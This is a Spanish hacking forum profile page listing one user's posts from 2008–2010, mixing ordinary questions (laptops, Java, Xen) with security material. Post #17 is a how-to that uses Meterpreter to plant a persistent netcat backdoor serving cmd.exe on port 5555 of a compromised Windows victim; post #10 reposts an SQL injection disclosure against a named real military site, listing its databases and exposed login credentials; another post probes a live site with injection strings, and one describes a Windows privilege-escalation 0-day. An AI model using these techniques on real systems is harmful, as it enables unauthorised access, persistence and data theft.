Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - kamsky

#1
Os dejo la lista de vídeos de este interesante curso sobre seguridad en redes inalámbricas:

http://www.securitytube.net/groups?operation=view&groupId=9
#2
Alguna recomendación de app que muestre gráficamente la intensidad de las señales capturadas? algo como esta app de Android (a poder ser más bonito :p) : http://espalandroid.net/NET/Apps/wifi-manager-redes-radar-escaner-android2.png

Thanks!
#3
Hacking / Happy Ninjas
27 Diciembre 2010, 12:46 PM
#4
 0 day: Elevación de privilegios en Microsoft Windows
----------------------------------------------------

Se ha públicado un nuevo 0 day en Microsoft Windows que permite a un
usuario local obtener privilegios de SYSTEM (control total sobre el
sistema) eludiendo cualquier control de usuario.

Los detalles técnicos se han hecho públicos, así como el código fuente y
el programa necesarios para aprovechar el fallo. El exploit se aprovecha
de la forma en la que el controlador win32k.sys procesa ciertos valores
del registro. En concreto, el exploit manipula el valor
SystemDefaultUEDCFont del registro y activa el soporte para EUDC
(End-User-Defined-Characters) a través de la función EnableEUDC.

Esto quiere decir que el atacante debe crear una clave en el registro
donde un usuario no administrador tiene privilegios para hacerlo. Luego
intenta leerla, provoca el fallo en el driver y obtiene los privilegios.
La prueba de concepto utiliza esta clave:

HKEY_USERS\[SID DEL USUARIO]\EUDC

La prueba de concepto funciona perfectamente en Windows Vista, 7 y 2008
totalmente parcheados. Tanto si el usuario pertenece al grupo de
usuarios como al de administradores (incluso con la protección UAC
activa), se obtendrán privilegios sin ningún tipo de advertencia por
parte de Windows y por supuesto, sin necesidad de conocer la contraseña.

En Windows XP, la prueba de concepto no funciona (no existe por defecto
esa rama del registro) pero es posible que la vulnerabilidad también le
afecte. La prueba de concepto no es detectada por ningún motor en estos
momentos:

http://www.virustotal.com/file-scan/report.html?id=59260532fe33547420613b0aa7b001aed3f565201e50f91558a16cf7465775f6-1290672402

Para que este fallo fuese aprovechado por un atacante o malware, primero
debería acceder al sistema por cualquier otro medio y encontrarse con
que no puede realizar los cambios que desea a causa de los permisos.
Realmente, este no suele ser un impedimento para el malware masivo
(puesto que el usuario medio suele o bien obviar el UAC o bien
deshabilitarlo o bien en XP pertenecer al grupo de administradores). Sí
que es posible que este fallo sea usado en ataques dirigidos o entornos
profesionales, donde los usuarios de escritorio suelen tener privilegios
limitados en el dominio.

Con este fallo, ya son dos problemas de elevación de privilegios que
Microsoft debe arreglar. El fallo anterior fue descubierto en el cuerpo
del famoso troyano Stuxnet. A través del programador de tareas, el
malware era capaz de elevar privilegios en el equipo infectado. Hace
algunos días los detalles de esta vulnerabilidad también se hicieron
públicos.

El equipo de seguridad de Microsoft ha declarado en su twitter que está
investigando el asunto. Un método para prevenir el problema hasta que
exista parche oficial es limitar los permisos del usuario en la rama

HKEY_USERS\[SID DEL USUARIO]\EUDC

En el registro, se debe negar el permiso de escritura a los usuarios no
administradores. Gráficamente, es sencillo (localizar el SID del
usuario, botón derecho sobre la rama del registro y denegar).

Para automatizar el proceso, aconsejamos (aunque puede tener efectos
secundarios, hágalo bajo su responsabilidad) utilizar subinacl.exe, una
herramienta oficial de Microsoft descargable desde:

http://www.microsoft.com/downloads/en/details.aspx?FamilyID=e8ba3e56-d8fe-4a91-93cf-ed6985e3927b

Una vez instalada, localizar el SID del usuario (normalmente terminará
en 1000) y el nombre de máquina y usuario con el comando:

whoami /user:

INFORMACIÓN DE USUARIO
----------------------

Nombre de usuario SID
==============================================
ordenador\usuario S-1-5-21-123456789-12345677889-123445678990-1000

y ejecutar:

subinacl.exe /subkeyreg "HKEY_USERS\
S-1-5-21-123456789-12345677889-123445678990-1000\EUDC /deny=
ordenador\usuario=w

Esto evitará que el usuario pueda escribir en esa rama y por tanto la
prueba de concepto no funcionará. Repetir para el resto de usuarios en
el equipo si los hubiera.

Fuente:http://www.hispasec.com/unaaldia/4415
#5
Hardware / Sugerencia Portátil
16 Abril 2010, 11:48 AM
Buenas!

Pues a ver, ya llevo casi 5 años con mi viejo portátil y va siendo hora de renovar! He estado mirando bastantes portátiles (Dell, Sony, ...) y al final no he llegado a nada en claro!  :P

He de decir que el tema del Hw no es mi fuerte, así que me pongo en vuestras manos, os pongo los requisitos y a ver que me podéis recomendar:

- Precio a gastarme: máximo rondando los 700 €
- Uso profesional (Ingeniero Informático)
- Sistema Operativo: Linux, en lo que me llegue si trae Win lo borraré, he mirado Ahtec sin OS, pero no me terminan de convencer
- Tema de gráficas y tal es lo de menos, no juego ni nada.
- Pantalla: de 15'4 o 15'6
- Una buena Ram (4 Gb) y un buen procesador
- HD (estado sólido?-> se sube mucho de precio): mínimo 320 Gb
- Wifi

Chorraditas que si vienen pues bien, y si no pos nada
- Cámara
- Bluetooth
- Huella dactilar

Bueno, pues a ver que me contáis!

un saludo
#6
Acaba de abrirse al público el blog oficial de esta comunidad: http://blog.elhacker.net

Esperamos que sea un pasito más para hacer de esta comunidad un referente a nivel mundial.

Cada autor que lo considere necesario habilitará un post en el subforo adecuado para debatir sobre las entradas que se vayan publicando.

Un saludo y bienvenidos a este nuevo proyecto!
#7
Bueno, pues llegó a mis manos hace un par de días la revista Hakin9 de este mes (versión americana), y hoy leyendo uno de los artículos sobre técnicas hacking de mobile phones aparece citado Gospel y el bug que encontró.

;-) ;-)
#8
Hacking / Las 10 contraseñas más comunes
26 Enero 2010, 12:11 PM
La firma de seguridad Imperva ha analizado las 32 millones de contraseñas que fueron robadas a finales del 2009 en un ataque al sitio RockYou. Los resultados son sumamente alarmantes, y deja en evidencia que la mayoría de los usuarios no tienen la más mínima responsabilidad a la hora de elegir una contraseña.

De las más de 30 millones de contraseñas que se analizaron, el 60% de ellas se basaban únicamente en números, el 30% tenía tan sólo seis caracteres o incluso menos, y la mitad eran palabras habituales del diccionario y nombre propios.

Imperva creó una lista con las contraseñas más comunes, y por desgracia, la preferida por los usuarios es "123456″. Lo peor es que la segunda más utilizada no es mucho mejor: "12345″. De hecho, toda la lista está conformada por claves que no ofrecen nada de seguridad y que pueden ser robadas muy fácilmente:

   1. 123456
   2. 12345
   3. 123456789
   4. password
   5. iloveyou
   6. princess
   7. rockyou
   8. 1234567
   9. 12345678
  10. abc123


#9
Nivel Web / Demo de XSS+BeeF
14 Enero 2010, 16:20 PM
muy buen video explicando algunas de las posibilidades de esta maravillosa aplicación

http://www.youtube.com/watch?v=Q9pQ3NlJtFE
#10
                                /\                                    (_) |
                               /  \   _ __ _ __ ___  _   _   _ __ ___  _| |
                              / /\ \ | '__| '_ ` _ \| | | | | '_ ` _ \| | |
                             / ____ \| |  | | | | | | |_| |_| | | | | | | |
                            /_/    \_\_|  |_| |_| |_|\__, (_)_| |_| |_|_|_|
                                                      __/ |
                                                     |___/                 

The United States Army is the branch of the United States Military responsible for land-based military operations. It is the largest and oldest established branch of the U.S. military and is one of seven uniformed services. The modern Army has its roots in the Continental Army which was formed on 14 June 1775, before the establishment of the United States, to meet the demands of the American Revolutionary War. Congress created the United States Army on 14 June 1784 after the end of the war to replace the disbanded Continental Army. The Army considers itself to be descended from the Continental Army and thus dates its inception from the origins of that force.
Vulnerable link: http://onestop.army.mil
This website is vulnerable to MSSQL Injection. With this vulnerability i can see / extract all things from databases.
Testing:
and 1=1– (True)

and 1=2– (False)

Ok, in this picture we can see all main informations about webserver.

Main information:
Citar[b]#Version[/b]: Microsoft SQL Server 2000 - 8.00.2282 (Intel X86) Dec 30 2008 02:22:41 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2
[b]#User[/b]: Dynatouch
[b]#Database[/b]: AHOS
[b]#Host Name[/b]: AHSGSVDAHQIT130

All databases:
Citar[0] AHOS
[1] master
[2] tempdb
[3] model
[4] msdb
[5] AHOS
[6] AHIT_WEB
[7] AHOS_HQD
[8] AHOS_WL
[9] HEAT
[10] REF_DB
[11] ReportDB
[12] USAREUR_TEST
[13] YARDI_CONV
[14] HOMES_IFS
[15] HOMES_CDB_USAREUR
[16] HOMES_WHSE
[17] HUACFSDIS102148
[18] PINEA4CASTLE
[19] HOMES_CDB
[20] GFOQ_Development
[21] ARTI02036THS003
[22] BISM5843235S301
[23] CDAR0413DPWS001
[24] CHAB000639BS002
[25] FRSA1050WHDS212
[26] GGDE0032284S005
[27] GRAF0244HOUS001
[28] HDCS3980WHDS204
[29] Spotlight
[30] LEDW0003SWFS002
[31] LEDW0252GSWS003
[32] NHQA4106WDAS101
[33] PANS2913GSTS001
[34] PION0011414S601
[35] SEMI0022DPWS002
[36] SULL0255WMAS001
[37] VCAM0107HOUS001
[38] WARN7114279S003
[39] WETZ8876222S210
[40] WIAF1023221S001
[41] LEDW0252GSWS001
[42] BUCHAHOMES01
[43] CASEA4KORHOU068
[44] GREE305APDPW001
[45] HNRYA4KOA4HG086
[46] HUMPA1KODPWH014
[47] RICH123A0PHO001
[48] SCHOU01A4DPWHMS
[49] TORIDPWA4177105
[50] WAIN224DB003153
[51] YONGA4KODPHD995
[52] ZAMADPWA0067011
[53] ANADA1HOMES
[54] APGRA0GAG-HOMES
[55] BENNA0I32214251
[56] BLISSVDPW1HS001
[57] BRAGA4PWAJ18145
[58] CARSDPWXAPS0002
[59] DAEN3104WKLS005
[60] DAMIAP06
[61] DIXXAPRDPW00001
[62] DRUMA001VA11202
[63] DUGWITA4HOMES
[64] EUSTDB13HOMES01
[65] FS-HOMES01
[66] FTBELVOIR_S001
[67] GAHSGHOMES
[68] GORDDBRCP001
[69] HAMIA1206DPW008
[70] HAWTA0HOMES
[71] HIALA0KOA4HG170
[72] HOODA0DPWSYS003
[73] IRWIIMA0HOMES3
[74] JACKDLEHOMES
[75] KNOXDBOSNT2
[76] KS-HSG-HOMES

We can access information_schema, so let's see the tables from principal database "AHOS"

Citar[0] comd_list
[1] dtproperties
[2] Faqs
[3] Faqs_Categories
[4] Forms
[5] forms_base
[6] gBase
[7] gBase_OLD
[8] gCountries
[9] gHousing_offices
[10] gHousing_offices-old
[11] gStates
[12] Housing_off_post
[13] Housing_phone_qr
[14] mgr_login
[15] mgr_login_OLD
[16] mgr_login_passwords
[17] mgr_login_save
[18] MgrCorner_Configuration
[19] MgrCorner_Configuration_ID
[20] must_know
[21] must_know_cat
[22] Must_know_OLD
[23] sysconstraints
[24] syssegments
[25] UPH
[26] UPH_OLD
[27] uph_photo_text
[28] uph_photo_tours
[29] uph_photos
[30] v_mapview
[31] V_RankView
[32] vHousingAreas
[33] vhqd_vrtours
[34] VIEW_housing
[35] VIEW_phototours
[36] VIEW_vrtours
[37] vMapFiles
[38] vMapOrder
[39] vPhotoFiles
[40] vPlan
[41] vPlanFiles
[42] vRank
[43] vRankDesc
[44] vRankRankDesc
[45] waitlist
[46] waitlist_items

Now, here are some interesting tables, like mgr_login_passwords.

Here i found user : password columns, with :
Citar#Username: Dynatouch
#Password: AHOS

wtf! :|
That it's all! Bye, TinKode...



dejo el enlace: http://tinkode.baywords.com/index.php/2010/01/army-mil-full-disclosure/
#12
Bases de Datos / Concatenar 2 sentencias en Oracle
16 Diciembre 2009, 21:35 PM
Pues eso, hay alguna forma de concatenar 2 sentencias en Oracle que no sea con punto y coma (me da error, invalid character).

He buscado bastante y todo indica que no, pero bueno, si alguien conoce algún truco o algo!

salu2
#13
Nivel Web / Web Shells
8 Diciembre 2009, 13:54 PM
#14
Recopilatorio de Temas del foro de Hacking Básico del mes de Noviembre

Temas Interesantes:

"truquillos" que facilitan un poco la vida en una shell remota
https://foro.elhacker.net/hacking_basico/truquillos_que_facilitan_un_poco_la_vida_en_una_shell_remota-t272659.0.html

[How To] Usando Netcat para conectarnos a diferentes protocolos
https://foro.elhacker.net/hacking_basico/how_to_usando_netcat_para_conectarnos_a_diferentes_protocolos-t276043.0.html

[Mini How-To] Usando Meterpreter
https://foro.elhacker.net/hacking_basico/mini_howto_usando_meterpreter-t275163.0.html

Varias distribuciones de seguridad en un solo pendrive
https://foro.elhacker.net/hacking_basico/varias_distribuciones_de_seguridad_en_un_solo_pendrive-t272920.0.html

Dudas más comunes:

- Netcat

https://foro.elhacker.net/hacking_basico/posible_hacer_esto_con_netcat-t275747.0.html
https://foro.elhacker.net/hacking_basico/preguntas_netcat-t275614.0.html
https://foro.elhacker.net/hacking_basico/problemas_para_acceder_a_shell_remota_con_netcat-t275027.0.html
https://foro.elhacker.net/hacking_basico/alguien_me_podria_ayudar_con_netcat-t273383.0.html
https://foro.elhacker.net/hacking_basico/duda_con_netcat-t274692.0.html
https://foro.elhacker.net/hacking_basico/netcat_multiples_shells-t272980.0.html
https://foro.elhacker.net/hacking_basico/ayuda_con_netcat_para_variar-t272657.0.html

- Arp Poisoning, Dns Poisoning, Ettercap, Dsniff, etc...

https://foro.elhacker.net/hacking_basico/acerca_del_uso_de_un_sniffer-t274771.0.html
https://foro.elhacker.net/hacking_basico/problema_con_ettercap_y_ipforwarding-t274099.0.html
https://foro.elhacker.net/hacking_basico/con_que_cosas_se_puede_y_con_cuales_no_usar_man_in_the_middle-t273386.0.html
https://foro.elhacker.net/hacking_basico/iquestenvenenamiento_de_dns-t273260.0.html
https://foro.elhacker.net/hacking_basico/plugin_remotebrowser_en_ettercap-t272750.0.html

- Ataques desde el exterior (mapear puertos, conseguir acceso router, escalar privilegios, etc...)

https://foro.elhacker.net/hacking_basico/iquestcomo_acceder_a_una_pc_que_se_encuentra_en_otra_ciudad_lejana_mediante_internet-t276981.0.html
https://foro.elhacker.net/hacking_basico/mapear_puertos_para_exploits-t276825.0.html
https://foro.elhacker.net/hacking_basico/acceso_remoto_habilitarlo_por_cmd-t275703.0.html
https://foro.elhacker.net/hacking_basico/toma_de_control_de_1_pc_protegido-t276385.0.html
https://foro.elhacker.net/hacking_basico/problema_acceso_a_lan_atacada-t276579.0.html
https://foro.elhacker.net/hacking_basico/problemas_para_acceder_a_shell_remota_con_netcat-t275027.0.html
#15
Nivel Web / ENHORABUENA SIMPLEAUDIT
2 Diciembre 2009, 11:16 AM
bueno, solo quería dar la enhorabuena a todos los integrantes de SimpleAudit, ya que el trabajo que habeis hecho ya se está haciendo notorio ahí fuera:

http://www.securitybydefault.com/2009/12/la-posible-migracion-smf-de-elhackernet.html
#16
Bueno, surgen muchas dudas y preguntas sobre netcat y algunos de sus usos, muchas de estas dudas, por no decir todas, ya han sido respondidas varias veces.

Partiendo de esto, una de las dudas más comunes y que por ejemplo se ha discutido en un post reciente, es como usar netcat para conectarnos a un Servidor Web mediante el protocolo HTTP, pero como este caso, pueden surgir varios: conectarnos a http sobre ssl, ftp, irc, etc...

Os dejo un buen tuto donde se explica todo esto con ejemplos y que la verdad que está muy bien, eso si, en perfecto inglés!

http://www.foureleven.org/art/art_netcat.html

Un Must-Read como una casa!
#17
Hacking / [Mini How-To] Usando Meterpreter
20 Noviembre 2009, 02:08 AM
Bueno, en este mini-manual, simplemente quería ilustrar el potencial de este magnífico plug-in que nos ofrece la suite MetaSploit Framework.

El meterpreter o meta intérprete es una familia de plugins avanzados para utilizar sobre sistemas Windows comprometidos que tienen como característica fundamental que todo es cargado en la memoria del sistema sin crear ningún proceso adicional. Además aporta mucha flexibilidad, permitiendo mil y una funciones al alcance de un sólo comando, con lo que nos permite realizar los ataques haciendo algo menos de ruido.

Antes de ir a lo práctico, os quiero mostrar todas las posibilidades que nos ofrece esta genial herramienta:

CitarCore Commands
=============

Command       Description
——-       ———–
?             Help menu
channel       Displays information about active channels
close         Closes a channel
exit          Terminate the meterpreter session
help          Help menu
interact      Interacts with a channel
irb           Drop into irb scripting mode
migrate       Migrate the server to another process
quit          Terminate the meterpreter session
read          Reads data from a channel
run           Executes a meterpreter script
use           Load a one or more meterpreter extensions
write         Writes data to a channel

Stdapi: File system Commands
============================

Command       Description
——-       ———–
cat           Read the contents of a file to the screen
cd            Change directory
download      Download a file or directory
edit          Edit a file
getlwd        Print local working directory
getwd         Print working directory
lcd           Change local working directory
lpwd          Print local working directory
ls            List files
mkdir         Make directory
pwd           Print working directory
rmdir         Remove directory
upload        Upload a file or directory

Stdapi: Networking Commands
===========================

Command       Description
——-       ———–
ipconfig      Display interfaces
portfwd       Forward a local port to a remote service
route         View and modify the routing table

Stdapi: System Commands
=======================

Command       Description
——-       ———–
execute       Execute a command
getpid        Get the current process identifier
getuid        Get the user that the server is running as
kill          Terminate a process
ps            List running processes
reboot        Reboots the remote computer
reg           Modify and interact with the remote registry
rev2self      Calls RevertToSelf() on the remote machine
shutdown      Shuts down the remote computer
sysinfo       Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================

Command       Description
——-       ———–
idletime      Returns the number of seconds the remote user has been idle
uictl         Control some of the user interface components

Priv: Password database Commands
================================

Command       Description
——-       ———–
hashdump      Dumps the contents of the SAM database

Priv: Timestomp Commands
========================

Command       Description
——-       ———–
timestomp     Manipulate file MACE attributes

Bueno, como ejemplo básico del uso de meterpreter, vamos a suponer que hemos encontrado una vulnerabilidad en un sistema Windows, y que con ayuda del Metasploit le cascamos el exploit y le indicamos que como payload nos devuelva una sesión con el meterpreter a través de una conexión directa a la víctima.

Una vez que estamos situados en este escenario, nuestra tarea va a ser crear un backdoor un tanto rudimentario (pero efectivo), vamos a subirle un netcat a la víctima, y creando adecuadamente una entrada en el registro, vamos a hacer que cada vez que se arranque el sistema se ejecute netcat y espere conexiones en el puerto 5555, de forma que en el momento en el que nos conectemos, nos devuelva un cmd.

Bueno, pues manos a la obra!

Una vez que tenemos nuestro flamante metasploit corriendo...



Y como hemos indicado, se ha conseguido explotar alguna vulnerabilidad en el sistema remoto y obtener una sesión de meterpreter, procedemos a subir el ejecutable del netcat a la víctima, más concretamente a la carpeta System32:


Una vez que está subido, el siguiente paso será insertar una clave en el registro para que el programa se ejecute automáticamente al iniciar el sistema, y comprobamos que la clave se haya añadido :



la imagen es un poco grande y no se ve todo el comando de netcat, que sería:
netcat.exe -L -d -p 5555 -e cmd.exe


Finalmente, esperamos a que el Sistema de la víctima se reinicie para comprobar si ha funcionado el backdoor...



Voilà!! Parece que todo ha funcionado, y el Sistema al reiniciarse ejecuta sin problemas el netcat.
Para comprobarlo, otra captura más del registro del Pc Víctima visto desde dentro, donde comprobamos que efectivamente todo se ha añadido correctamente:




Como veis, esto es simplemente la punta del iceberg, es un ejemplo muy básico, pero creo que a la vez muy descriptivo de lo que se puede llegar a hacer y la facilidad con la cual hacerlo...

Os insto a que le echeis un ojo a este magnífico plug-in, y a su gran lista de funcionalidades, sin duda es una herramienta que nos hará la vida un poco más fácil!

saludos
#18
Bueno, lo he puesto en eventos en hacking, pero seguramente aquí también esté bien, así que dejo el link

https://foro.elhacker.net/hacking_avanzado/ultimos_eventos_sobre_seguridadinseguridad-t149468.0.html;msg1348225#msg1348225
#20
Hacking / POR UN FORO MEJOR Y NORMAS
29 Octubre 2009, 02:30 AM
Los Moderadores del SubForo de Hacking Básico hemos decidido re/organizar este subforo, con el fin de ACTUALIZAR contenidos, CREAR nuevos contenidos y obviamente porque creemos que con estos ligeros cambios conseguiremos MEJORAR este subforo.

Nos vamos a basar en el documento que en su día posteó Gospel, ya que la mayoría de los puntos siguen vigentes, modificando o añadiendo cosas puntuales donde se crea necesario:

¿Qué pasa con el Foro de Hacking Básico?

El Foro de Hacking Básico se convierte en el Foro de Hacking por excelencia.
En este foro se postearán las dudas relacionadas con temas de Hacking e In/Seguridad Informática, pero su contenido deberá ajustarse a la normativa del foro.

El Foro de Hacking lleva muchos años activo en elhacker.net y por aquí han pasado infinidad de usuarios planteando sus dudas y obteniendo respuesta a las mismas. Es bastante posible que los nuevos usuarios tengan dudas cuyo contenido ya ha sido expuesto en otros temas anteriores. Por esta razón, recomendamos acudir al hilo de FREQUENTLY ASKED QUESTIONS y utilizar el botón antes de postear un nuevo tema en el Foro.

Recordamos que los Moderadores se reservan el derecho a eliminar cualquier tema posteado cuya duda ya haya sido resuelta.


¿Qué pasa con el Foro de Hacking Avanzado?

El Foro de Hacking Avanzado se convierte en el Foro de Papers relacionados con el Hacking y la In/Seguridad Informática.
En este Foro estarán disponibles:
    - Manuales y Tutoriales
    - Cursos y Talleres
    - Documentos de interés para la Seguridad Informática.

Con esta iniciativa, elhacker.net pretende disponer de un repositorio de papers que permitan ofrecer ayuda al usuario. Asimismo, quiere motivar la participación activa de los usuarios, animándolos a plasmar en un documento sus conocimientos sobre temas de Hacking.

Para fomentar este último punto, se intentarán crear la mayor cantidad de actividades posibles en las que los usuarios se sientan partícipes y puedan interactuar activamente entre nosotros/ellos, pero volveremos a esto más tarde.

¿Por qué este cambio de política?

El objetivo principal de los Moderadores es mejorar la calidad de convivencia del Foro.
Por un lado, el Foro debe permitir a los nuevos usuarios obtener respuestas a sus preguntas. Estas respuestas pueden ser obtenidas navegando a través del hilo de FREQUENTLY ASKED QUESTIONS y utilizando el botón . Resulta incómodo ver publicadas en el foro consultas de usuarios que ya han sido respondidas con anterioridad y no suponen utilidad para el resto de la comunidad.
Por otro lado, el Foro debe permitir a cualquiera plantear una duda que no haya sido resuelta y obtener respuesta mediante la participación del resto de usuarios, siendo ésta la actividad que en verdad enriquece la calidad del Foro.

Con el fin de mejorar el funcionamiento de esta comunidad, los Moderadores de los foros de Hacking actuarán en consecuencia a la normativa vigente y vigilarán por el buen uso del Foro.

Recordad! antes de publicar un post, pensad si vuestra acción va a beneficiar a otros usuarios o, por el contrario, sólo va a servir para obtener una respuesta rápida a vuestras necesidades egoístas. El Foro lo hacemos entre todos!


¿Cual va a ser la nueva dinámica?

Vamos a intentar mantener 3 chinchetas principales, en las que se agrupará en su interior el contenido correspondiente a estas temáticas

- Chincheta sobre Reglas y todo lo relacionado con este tema

- Chincheta sobre documentos autocontenidos, es decir, posts donde todo lo necesario para su entendimiento está explicado en ellos mismos

- Chincheta con enlaces a otros posts/enlaces externos

En principio se va a trabajar con estas 3 chinchetas, pero obviamente se irán generando posts que se consideren de especial interés y que merezcan una chincheta, pero aquí estará el cambio, estas chinchetas permanecerán un máximo de 2 meses, pasando después a alguno de los 3 grupos citados anteriormente.
Puede haber excepciones cuando una chincheta se actualice con cierta periodicidad.


Talleres, HowTo's, etc...

Como se ha expuesto antes, uno de nuestros objetivos fundamentales es fomentar en la medida de lo posible, la participación de los usuarios que visiten el subforo, por lo que se van a ir creando/actualizando poco a poco actividades que así lo permitan, como pueden ser talleres, HowTo's eminentemente prácticos, retos, etc...




Normas del Subforo

1) En este Foro, sólo está permitido hablar sobre temas de Hacking e In/Seguridad Informática.

   1.1) Serán movidos/eliminados del Foro aquellos temas relacionados con otras secciones de foro.elhacker.net, tales como Exploits, Defensa de Sistemas, Virus y Troyanos, etc.

   1.2) Serán eliminados del Foro aquellos temas que no cumplan con unos requisitos mínimamente científicos y educacionales, tales como:
- Hackeo de cuentas de correo ajenas.
- Envío masivo de virus o spam.
- Fastidiar a otras personas.
- etc.


2) Serán bloqueados/eliminados del Foro aquellos temas que no se ajusten al formato de posteado adecuado.

   2.1) Serán bloqueados/eliminados del Foro aquellos temas que ya hayan sido contestados y repetidos. Antes de postear, buscad si vuestra duda ya ha sido resuelta con anterioridad utilizando el botón .

   2.2) Serán bloqueados/eliminados del Foro aquellos temas cuya duda sea fácilmente resuelta preguntando correctamente en Google o

   2.3) Serán bloqueados/eliminados del Foro aquellos temas cuyo título no describa el contenido del mensaje. Estoy hablando de todos aquellos temas que se titulan: "Ayuda", "Help", "Urgente", "Alguien sabe si...", etc.

   2.4) Serán bloqueados/eliminados del Foro aquellos posts cuya presentación no sea mínimamente legible. Estoy hablando de todos aquellos usuarios que escriben en mayúsculas (aquí nadie grita!), que escriben con colorines, que escriben en $up3rJ3r64 H4x0r (aquí nadie es más wuay que otros!), etc.

      2.4.2) Serán bloqueados/eliminados del Foro aquellos posts cuya presentación atente contra
      el diccionario de la Real Academia de la Lengua Española.

     Si no sabes escribir, no sé que haces utilizando un PC. Nadie es perfecto y se admiten
     cosas como confundir una B con una V por esta cerca en el teclado.
     Pero alguien me explica que es eso de funka? ??? wey? ???

     Escribir bien no cuesta nada.

3) Los moderadores se reservan el derecho a bloquear/mover/eliminar cualquier tema que ellos consideren conveniente y, además, se reservan el derecho a dejar un mensaje de movido/eliminado.
Si no encuentras tu post, busca por el foro por si ha sido movido. Si aún así no lo encuentras, es posible que haya sido eliminado por no ajustarse a las normas del Foro. En cualquier caso, puedes contactar con los Moderadores si tienes dudas.




Los Moderadores se reservan el derecho a modificar esta Normativa según acontecimientos del Foro.

Esta normativa se ajusta a la normativa general del Foro de elhacker.net.
- REGLAS DEL FORO elhacker.net -
http://foro.elhacker.net/index.php/topic,17721.0.html




Esperamos que este nuevo giro de tuerca sea del agrado de los usuarios, y que entre todos consigamos un foro mejor, gracias.

Los Moderadores.


#21
Bueno, pues ahí va un nuevo paper de lo que podría ser un ataque modelo.

En este caso el ataque versa sobre un ataque a una empresa ficticia en la red, en la que se siguen más o menos los siguientes pasos hasta hacernos con el control total:

- Recopilación de Información
- Buscando puntos débiles
- Consiguiendo acceso a la LAN Interna
- Saltando entre los diferentes equipos
- Control Total

El enlace para descargaros el paper es el siguiente:
http://ns2.elhacker.net/guia_ataque_modelo_2.pdf

Como siempre, espero vuestros comentarios, preguntas, dudas, ruegos, insultos, etc... :P

salu2
#22
Nivel Web / dudas/problemas sql injection ms-access
14 Septiembre 2009, 17:54 PM
Buenas!

Bueno, siempre he tenido "apartado" el tema de sql injection (por pereza :p) dándole prioridad a otras cosas, pero bueno, creo que ya es hora de ponerme...

asi que últimamente he estado leyendo bastante y tal, y haciendo pruebas por ahí...

bueno, el problema me ha surgido, al encontrarme un sitio que es vulnerable, y que usa MSSQL, pero que no soy capaz de avanzar nada... :S

veamos, digamos que la página vulnerable es esta:
www.pagina.es/torneo.asp?torneo=09090601

dado que si inserto una simple comilla, me tira esto:
www.pagina.es/torneo.asp?torneo=09090601'

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error in query epresionje 'cdgo_torneo LIKE '09090601'%''.

/torneo.asp, line 54


de ahí deduzco que es vulnerable, y que la sentencia SQL debe ser algo como...
Citarselect ... from ... where cdgo_torneo LIKE 'numerito%' ...

donde el % significa que 0 o más caracteres a continuación del id_torneo, hasta aquí bien...

intento algo como:
www.pagina.es/torneo.asp?torneo=09090601'%20having%201=1--
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error in query epresionje '1=1--%''.

/torneo.asp, line 54


por lo que parece que el having se lo pasa por el forro...
intento meter algún paréntesis por si en el Where lo hubiera o algo...:
www.pagina.es/torneo.asp?torneo=09090601')%20having%201=1--
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Extra ) in query epresionje 'cdgo_torneo LIKE '09090601')'.

/torneo.asp, line 54


he probado con comillas dobles, con puntos y coma en vez del doble guión...y no llego a nada en claro :S

lo "máximo" que he conseguido es sacar otro tipo de error (con ; en vez de --) a parte de los 2 que puse antes:
www.pagina.es/torneo.asp?torneo=09090601'%20having%201=1;
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Characters found after end of SQL statement.

/torneo.asp, line 54



alguna sugerencia/idea/recomendación ??¿¿ :huh:

gracias y salu2 a todos
#23
Hacking / [HOW TO] Ataque modelo Wifi
27 Julio 2009, 17:29 PM
bueno, pues aquí os dejo un pdf, con lo que podría ser un ataque modelo en un entorno casero, es decir:

- buscar AP inalámbrico al que conectarnos
- sacar la clave para ello
- localizar hosts conectados a la red
- sniffar tráfico de estos
- y finalmente hacernos con el control total del host

quiero agradecer los ánimos que me ha dado para hacerlo Averno, y espero vuestras dudas/quejas/sugerencias impaciente.

http://ns2.elhacker.net/Ataque modelo I.pdf
#24
GNU/Linux / Manual de Xen
11 Febrero 2009, 23:14 PM
Bueno realicé este manual recientemente para la Uni, pero quiero compartirlo también con la gente, aunque es una introducción muy básica, se tratan cosas bastante interesantes y que pueden dar mucho juego, espero que les sirva de introducción para Xen y las puertas que abre la virtualización de servidores (pero virtualización en serio,nada de tonterias de vmware :p) mediante Xen.

Un saludo, espero que les guste y estoy abierto a cualquier comentario/sugerencia!

http://rapidshare.com/files/196963470/manual_xen.pdf.html

#25
Java / ruta completa de archivo
25 Julio 2008, 13:05 PM
buenas, estoy haciendo un plugin de NetBeans para Ocaml, he conseguido ya el soporte para el nuevo tipo de ficheros (.ml), y he conseguido reescribir el botón de Run para enlazarlo con el compilador externo de Ocaml,pero el problema esque al compilador ha de pasársele la ruta completa del archivo a compilar, y ahi está el problema, una vez que en el netbeans se abre y se trabaja con el archivo a compilar/ejecutar, lo único que he conseguido es sacar rutas relativas del archivo (por ejemplo con la clase DataObject), pero nunca la ruta entera desde la raiz del S.O....

Lo estoy desarrollando en Linux, y había pensado una solución un tanto chapucera, llamar a la orden FIND ,que si que devuelve la ruta completa,pero claro , este plug-in también debe trabajar en Win,asi que...alguna idea???

y ya que estamos, también me he propuesto a parte de que se reconozca el tipo de archivo .ml, que se coloree la sintaxis y esas cosillas (todo hecho ya), poder crear un nuevo proyecto de tipo OCAML, en el módulo eligo añadir New Template o algo así , y muy bien, se crea la entrada de nuevo proyecto y tal, pero me salen las carpetas del módulo, las librerias y tal..vamos como si se tratase un proyecto java, y yo no quiero eso, simplemente que le des a nuevo proyecto y te salga un simple archivo de plantilla...alguien tiene idea de como hacer que no salgan todos esos archivos y carpetas que salen por defecto y elegir lo que quiero que se cree????

gracias!
#26
Java / cambiar System.in
27 Mayo 2008, 09:58 AM
